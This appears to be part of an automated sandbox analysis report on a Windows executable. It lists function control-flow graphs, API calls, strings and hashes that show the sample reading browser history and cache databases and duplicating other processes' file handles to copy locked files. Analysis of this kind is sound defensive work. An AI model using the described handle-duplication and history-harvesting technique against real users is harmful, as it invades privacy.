                                                                                                                                                                    control_flow_graph 504 40e2ab-40e2ce call 40695d call 406b90 508 40e2d3-40e2d5 504->508 509 40e4a0-40e4af call 4069a3 508->509 510 40e2db-40e300 508->510 511 40e304-40e316 call 406e8f 510->511 516 40e476-40e483 call 406b53 511->516 517 40e31c-40e39b call 40dd50 * 7 memset call 40aa29 511->517 522 40e302 516->522 523 40e489-40e495 call 40aa04 516->523 541 40e3c9-40e3ce 517->541 542 40e39d-40e3ae call 40742e 517->542 522->511 523->509 529 40e497-40e49f ??3@YAXPAX@Z 523->529 529->509 543 40e3d0-40e3d6 541->543 544 40e3d9-40e3de 541->544 551 40e3b0 542->551 552 40e3b3-40e3c1 wcschr 542->552 543->544 546 40e3e0-40e3f1 memcpy 544->546 547 40e3f4-40e3f9 544->547 546->547 549 40e3fb-40e40c memcpy 547->549 550 40e40f-40e414 547->550 549->550 553 40e416-40e427 memcpy 550->553 554 40e42a-40e42f 550->554 551->552 552->541 555 40e3c3-40e3c6 552->555 553->554 556 40e431-40e442 memcpy 554->556 557 40e445-40e44a 554->557 555->541 556->557 558 40e44c-40e45b 557->558 559 40e45e-40e463 557->559 558->559 559->516 560 40e465-40e469 559->560 560->516 561 40e46b-40e473 560->561 561->516
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                                      • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040E49A
                                                                                                                                                                      • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                                    • memset.MSVCRT ref: 0040E380
                                                                                                                                                                      • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                                                      • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                                                                                                                                                    • wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                                    • memcpy.MSVCRT ref: 0040E3EC
                                                                                                                                                                    • memcpy.MSVCRT ref: 0040E407
                                                                                                                                                                    • memcpy.MSVCRT ref: 0040E422
                                                                                                                                                                    • memcpy.MSVCRT ref: 0040E43D
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000005.00000002.1794572867.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000005.00000002.1794572867.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000005.00000002.1794572867.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000005.00000002.1794572867.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_lhgtogaW.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: memcpy$_wcsicmpmemset$??3@wcschrwcslen
                                                                                                                                                                    • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                                                                                                    • API String ID: 3073804840-2252543386
                                                                                                                                                                    • Opcode ID: 3e36793f9e080becf73b9dda80bc1391f7a6b1e793b4af3828a127e2c1810b15
                                                                                                                                                                    • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                                                                                                                    • Opcode Fuzzy Hash: 3e36793f9e080becf73b9dda80bc1391f7a6b1e793b4af3828a127e2c1810b15
                                                                                                                                                                    • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 004091B8 Relevance: 25.8, APIs: 16, Strings: 1, Instructions: 272COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 562 4091b8-40921b memset call 40a6e6 call 444432 567 409520-409526 562->567 568 409221-40923b call 40b273 call 438552 562->568 572 409240-409248 568->572 573 409383-4093ab call 40b273 call 438552 572->573 574 40924e-409258 call 4251c4 572->574 585 4093b1 573->585 586 4094ff-40950b call 443d90 573->586 580 40937b-40937e call 424f26 574->580 581 40925e-409291 call 4253cf * 2 call 4253af * 2 574->581 580->573 581->580 609 409297-409299 581->609 589 4093d3-4093dd call 4251c4 585->589 586->567 595 40950d-409511 586->595 597 4093b3-4093cc call 4253cf * 2 589->597 598 4093df 589->598 595->567 600 409513-40951d call 408f2f 595->600 597->589 614 4093ce-4093d1 597->614 601 4094f7-4094fa call 424f26 598->601 600->567 601->586 609->580 611 40929f-4092a3 609->611 611->580 613 4092a9-4092ba 611->613 615 4092bc 613->615 616 4092be-4092e3 memcpy memcmp 613->616 614->589 617 4093e4-4093fb call 4253af * 2 614->617 615->616 619 409333-409345 memcmp 616->619 620 4092e5-4092ec 616->620 617->601 627 409401-409403 617->627 619->580 623 409347-40935f memcpy 619->623 620->580 622 4092f2-409331 memcpy * 2 620->622 625 409363-409378 memcpy 622->625 623->625 625->580 627->601 628 409409-40941b memcmp 627->628 628->601 629 409421-409433 memcmp 628->629 630 4094a4-4094b6 memcmp 629->630 631 409435-40943c 629->631 630->601 633 4094b8-4094ed memcpy * 2 630->633 631->601 632 409442-4094a2 memcpy * 3 631->632 634 4094f4 632->634 633->634 634->601
                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000005.00000002.1794572867.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000005.00000002.1794572867.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000005.00000002.1794572867.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000005.00000002.1794572867.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_lhgtogaW.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3715365532-3916222277
                                                                                                                                                                    • Opcode ID: 1c524b1582e21d5cf33c38ae172dfd569e4d92201c70e2bcc6981c46efb40b80
                                                                                                                                                                    • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                                                                                                    • Opcode Fuzzy Hash: 1c524b1582e21d5cf33c38ae172dfd569e4d92201c70e2bcc6981c46efb40b80
                                                                                                                                                                    • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0040E01E Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120fileCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                                                                                                      • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                                                                      • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                                                      • Part of subcall function 0040DD85: FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                                                                                      • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                                                      • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                    • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                                    • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                                    • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                                      • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                                                                      • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                      • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                      • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                                                                                                                                    • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                                    • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                                    • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                                                    • FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000005.00000002.1794572867.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000005.00000002.1794572867.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000005.00000002.1794572867.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000005.00000002.1794572867.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_lhgtogaW.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$Close$Handle$CreateProcess$ChangeCurrentFindNotificationTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                                                                                                    • String ID: bhv
                                                                                                                                                                    • API String ID: 327780389-2689659898
                                                                                                                                                                    • Opcode ID: d6173e2fc1e4a9acd8e6e5097b502ef7bad012bb9f4f5ce7a241332e90e3d993
                                                                                                                                                                    • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                                                                                                    • Opcode Fuzzy Hash: d6173e2fc1e4a9acd8e6e5097b502ef7bad012bb9f4f5ce7a241332e90e3d993
                                                                                                                                                                    • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0040C274 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    APIs
                                                                                                                                                                    • memset.MSVCRT ref: 0040C298
                                                                                                                                                                      • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                      • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                                                                                                      • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                                                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                    • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                                    • wcschr.MSVCRT ref: 0040C324
                                                                                                                                                                    • wcschr.MSVCRT ref: 0040C344
                                                                                                                                                                    • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                                    • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                                                                                                    • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000005.00000002.1794572867.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000005.00000002.1794572867.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000005.00000002.1794572867.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000005.00000002.1794572867.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_lhgtogaW.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                                                                                                                                                                    • String ID: visited:
                                                                                                                                                                    • API String ID: 2470578098-1702587658
                                                                                                                                                                    • Opcode ID: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
                                                                                                                                                                    • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                                                                                                    • Opcode Fuzzy Hash: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
                                                                                                                                                                    • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0040E175 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 91COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 721 40e175-40e1a1 call 40695d call 406b90 726 40e1a7-40e1e5 memset 721->726 727 40e299-40e2a8 call 4069a3 721->727 728 40e1e8-40e1fa call 406e8f 726->728 733 40e270-40e27d call 406b53 728->733 734 40e1fc-40e219 call 40dd50 * 2 728->734 733->728 739 40e283-40e286 733->739 734->733 745 40e21b-40e21d 734->745 741 40e291-40e294 call 40aa04 739->741 742 40e288-40e290 ??3@YAXPAX@Z 739->742 741->727 742->741 745->733 746 40e21f-40e235 call 40742e 745->746 746->733 749 40e237-40e242 call 40aae3 746->749 749->733 752 40e244-40e26b _snwprintf call 40a8d0 749->752 752->733
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                                    • memset.MSVCRT ref: 0040E1BD
                                                                                                                                                                      • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                                                                                                                                                      • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                                      • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                                                                                                      • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                                                                                                    • _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                                      • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                      • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                                                                                                                      • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                                                                                                                      • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000005.00000002.1794572867.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000005.00000002.1794572867.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000005.00000002.1794572867.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000005.00000002.1794572867.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_lhgtogaW.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ??3@$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                                                                                                    • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                                                                                                    • API String ID: 3883404497-2982631422
                                                                                                                                                                    • Opcode ID: a8b50b7bcc3e8c665b2e5c478097124d3492c25552be42f1d5eb6a41abf251f1
                                                                                                                                                                    • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                                                                                                                    • Opcode Fuzzy Hash: a8b50b7bcc3e8c665b2e5c478097124d3492c25552be42f1d5eb6a41abf251f1
                                                                                                                                                                    • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 004032B4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 119COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                                                                                                                                                      • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                                                                                                      • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                                                    • memset.MSVCRT ref: 004033B7
                                                                                                                                                                    • memcpy.MSVCRT ref: 004033D0
                                                                                                                                                                    • wcscmp.MSVCRT ref: 004033FC
                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 00403439
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000005.00000002.1794572867.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000005.00000002.1794572867.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000005.00000002.1794572867.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000005.00000002.1794572867.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_lhgtogaW.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: memset$??3@_wcsicmpmemcpywcscmpwcsrchr
                                                                                                                                                                    • String ID: $0.@
                                                                                                                                                                    • API String ID: 3030842498-1896041820
                                                                                                                                                                    • Opcode ID: 90c1bd1f00aab923b8f25d437f952d518439630af4329cefc1ee53129d619d56
                                                                                                                                                                    • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                                                                                                    • Opcode Fuzzy Hash: 90c1bd1f00aab923b8f25d437f952d518439630af4329cefc1ee53129d619d56
                                                                                                                                                                    • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0041F1A5 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 165COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000005.00000002.1794572867.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000005.00000002.1794572867.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000005.00000002.1794572867.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000005.00000002.1794572867.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_lhgtogaW.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: memcmp
                                                                                                                                                                    • String ID: @ $SQLite format 3
                                                                                                                                                                    • API String ID: 1475443563-3708268960
                                                                                                                                                                    • Opcode ID: bc797f5c287fbec082bfe36368e8bdb92b626008a1b8340b8f00afaa449410d4
                                                                                                                                                                    • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                                                                                                                    • Opcode Fuzzy Hash: bc797f5c287fbec082bfe36368e8bdb92b626008a1b8340b8f00afaa449410d4
                                                                                                                                                                    • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 004110DC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000005.00000002.1794572867.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000005.00000002.1794572867.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000005.00000002.1794572867.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000005.00000002.1794572867.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_lhgtogaW.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _wcsicmpqsort
                                                                                                                                                                    • String ID: /nosort$/sort
                                                                                                                                                                    • API String ID: 1579243037-1578091866
                                                                                                                                                                    • Opcode ID: a0f12cb90dd745c164ef67684cb79943b88980d13b6e843c418957b63f9314a7
                                                                                                                                                                    • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                                                                                                                    • Opcode Fuzzy Hash: a0f12cb90dd745c164ef67684cb79943b88980d13b6e843c418957b63f9314a7
                                                                                                                                                                    • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0040D092 Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000005.00000002.1794572867.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000005.00000002.1794572867.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000005.00000002.1794572867.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000005.00000002.1794572867.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_lhgtogaW.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ??2@
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1033339047-0
                                                                                                                                                                    • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                                                                                    • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                                                                                                    • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                                                                                    • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0040C1D3 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000005.00000002.1794572867.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000005.00000002.1794572867.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000005.00000002.1794572867.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000005.00000002.1794572867.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_lhgtogaW.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FileFindFirst
                                                                                                                                                                    • String ID: *.*$index.dat
                                                                                                                                                                    • API String ID: 1974802433-2863569691
                                                                                                                                                                    • Opcode ID: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
                                                                                                                                                                    • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                                                                                                                    • Opcode Fuzzy Hash: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
                                                                                                                                                                    • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0040A02C Relevance: 4.5, APIs: 3, Instructions: 26filetimeCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                                                    • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                                    • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000005.00000002.1794572867.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000005.00000002.1794572867.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000005.00000002.1794572867.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000005.00000002.1794572867.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_lhgtogaW.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$ChangeCloseCreateFindNotificationTime
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1631957507-0
                                                                                                                                                                    • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                                                    • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                                                                                                                    • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                                                    • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 004152C7 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 26COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
